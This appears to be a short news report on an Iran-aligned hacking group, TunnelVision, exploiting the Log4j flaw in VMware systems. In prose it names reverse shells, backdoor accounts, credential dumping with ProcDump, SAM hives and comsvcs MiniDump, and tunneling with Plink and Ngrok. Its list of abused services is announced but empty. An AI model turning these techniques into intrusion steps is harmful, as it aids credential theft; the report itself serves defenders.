Hackers aligned with the government of Iran are exploiting the critical Log4j vulnerability to infect unpatched VMware users with ransomware, dubbed TunnelVision
The name is meant to emphasize TunnelVision’s heavy reliance on tunneling tools and the unique way it deploys them. Earlier, TunnelVision has exploited so-called 1-day vulnerabilities meaning vulnerabilities that have been recently patched to hack organizations that have yet to install the fix. Vulnerabilities in Fortinet FortiOS (CVE-2018-13379) and Microsoft Exchange (ProxyShell) are two of the group’s better-known targets.
TunnelVision has started exploiting a critical vulnerability in Log4j, an open source logging utility that’s integrated into thousands of apps. CVE-2021-44228 allows attackers to easily gain remote control over computers running apps in the Java programming language.
TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials, and perform lateral movement,the threat actor initially exploits the Log4j vulnerability to run PowerShell commands directly, and then runs further commands by means of PS reverse shells, executed via the Tomcat process.
Apache Tomcat is an open source Web server that VMware and other enterprise software use to deploy and serve Java-based Web apps. Once installed, a shell allows the hackers to remotely execute commands of their choice on exploited networks. The PowerShell used here appears to be a variant of this publicly available one. Once it’s installed, TunnelVision members use it to:
- Execute reconnaissance commands
- Create a backdoor user and adding it to the network administrators group
- Harvest credentials using ProcDump, SAM hive dumps, and comsvcs MiniDump
- Download and run tunneling tools, including Plink and Ngrok, which are used to tunnel remote desktop protocol traffic
The hackers use multiple legitimate services to achieve and obscure their activities. Those services include:
People who are trying to determine if their organization is affected should look for unexplained outgoing connections to these legitimate public services.